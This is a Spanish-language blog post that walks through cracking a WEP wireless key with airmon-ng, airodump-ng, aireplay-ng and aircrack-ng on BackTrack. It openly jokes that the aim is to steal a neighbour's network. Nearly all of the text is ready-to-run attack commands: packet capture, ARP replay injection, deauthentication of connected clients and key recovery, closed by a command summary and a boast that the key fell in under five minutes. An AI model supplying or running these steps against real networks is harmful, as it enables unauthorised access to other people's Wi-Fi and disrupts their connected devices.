Que me preguntan: “cómo recupero el password de la wep de mi casa?” (por no decir “robo” y “vecino” (o cómo hackear la red inalámbrica))
Ahh pues muy fácil… entonces me puse a hacer una guía y pues mejor se las pongo aquí… nunca saben cuando se puede necesitar…
Bajen una versión bonita de BackTrack y sigan las instrucciones felices de abajo
# iniciar con KDE, (compiz) da problemas =)
# abrir la consola y escribir iwconfig y te fijas en el nombre de la tarjeta inalambrica
# En este caso voy a usar eth1
#escribes en la consola para encender el modo monitor:
airmon-ng start eth1
#despues hay que encender el programa de captura para ver que redes hay y quienes estan conectados
airodump-ng eth1
#van a salir en la parte de arriba las redes y abajo las computadoras asociadas a la red.
#Necesitas escoger una red que tenga al menos una computadora conectada o que la columna de Data crezca rapido
#Ya que sabes la red te fijas en que canal (CH) esta, yo voy a usar el 11
#Das ctrl + c para regresar a la consola
#Y comenzamos la captura de paquetes de un canal guardandolos en un archivo con el
#siguiente comando:
airodump-ng --channel 11 -w archivosalida.txt eth1
#Con esto el programa empieza a capturar los paquetes y los guarda en ese archivo
#El archivo de seguro se guarda en /root por si lo quieres usar o copiar mas adelante
#Acuerdate que como es live cd no se guardan los archivos, por lo que si lo quieres guardar necesitas una usb o ponerlo en el disco duro =)
#ahora hay que abrir otra consola para inyectar paquetes y que esto no se tarde mil horas
#el comando es el siguiente :
aireplay-ng --arpreplay -x 4 -h macaddressdealguienconectado -b macdelaccesspointdelared eth1
#esto lo sacas del otro programa que esta corriendo
#alguienconectado es la columna->STATION
#macdelaccesspoint es la columna-> BSSID
#el -x es el numero de paquetes q inyectas... mi tarjeta se traba y por eso le puse 4 para que
#bajara la velocidad... si la tuya aguanta mas pues ponle 10 o 20
#queda algo asi:
aireplay-ng --arpreplay -x 4 -h 00:14:78:8E:31:F9 -b 00:1D:5A:40:12:69 eth1
#bueno, con esto si lees un paquete que se pueda repetir la maquina lo va a inyectar a lo loco
#ahora falta hacer que la maquina conectada se desconecte e intente conectarse para
#generar mas paquetes que se pueden repetir =)
#solo que este comando hay q usarlo una vez y esperarte un ratito (para q las computadoras se desconecten y se vuelvan a conectar)
#este comando lo puedes hacer para cuantas computadoras haya conectadas al access point
#Abre otra consola y el comando es el siguiente:
aireplay-ng --deauth 1 -a macdelBSSID -c macdelSTATION eth1
#son los mismos de hace rato pero con otras letras
#queda algo asi
aireplay-ng --deauth 1 -a 00:1D:5A:40:12:69 -c 00:14:78:8E:31:F9 eth1
#y ya, en la consola con la que repetimos paquetes debe de empezar a captar paquetes para repetir, por lo que en la consola que esta capturando en la columna de data debe de empezar a crecer el numero
#Si ves que los paquetes que se estan repitiendo ya no suben la columna de data tan rapido entonces intenta lo de deautenticar de nuevo =)
#finalmente necesitas crackear la wep del archivo
#abre otra consola y el comando es el siguiente
aircrack-ng -n 64 archivodesalida.cap
#el -n 64 es para el numero de bits de la llave... no me acuerdo con cuantos paquetes obtienes la llave... creo que con 150,000 ya se puede obtener, pero no estoy seguro (infinitum usa 64 bits casi siempre)
#Pero si ves que no sale y ya tienes muchos paquetes intenta cambiando por -n 128
#y fijate bien como se llama el archivo de salida con el comando ls
#Cuando tengas suficientes paquetes te saldra la wep en esa consola =)
#algo asi como
KEY FOUND! [ 37:13:37:79:75 ]
#esa es la wep =)
#Te dejo un resumen de los comandos, cada uno en una ventana distinta ^^:
airmon-ng start eth1
airodump-ng --channel 11 -w archivosalida eth1
aireplay-ng --arpreplay -x 4 -h 00:14:78:8E:31:F9 -b 00:1D:5A:40:12:69 eth1
aireplay-ng --deauth 1 -a 00:1D:5A:40:12:69 -c 00:14:78:8E:31:F9 eth1
aircrack-ng -n 64 archivosalida-01.cap
**************************************
Update
Hoy que no tenia ni acentos ni nada mejor que hacer. Decidi probar mis metodos de crackeo de wep q debo confesar no uso desde hace mucho jajaja, los pasos nadamas me los sabia de memoria, el resultado fue que en lo que fui por comida y regrese ya habia terminado.
La saco en menos de 5 min y con 10, 215 paquetes jajaja mhhh creo q exagere con los 150,000. Pero claro el numero de paquetes depende de que tan buena sea la clave wep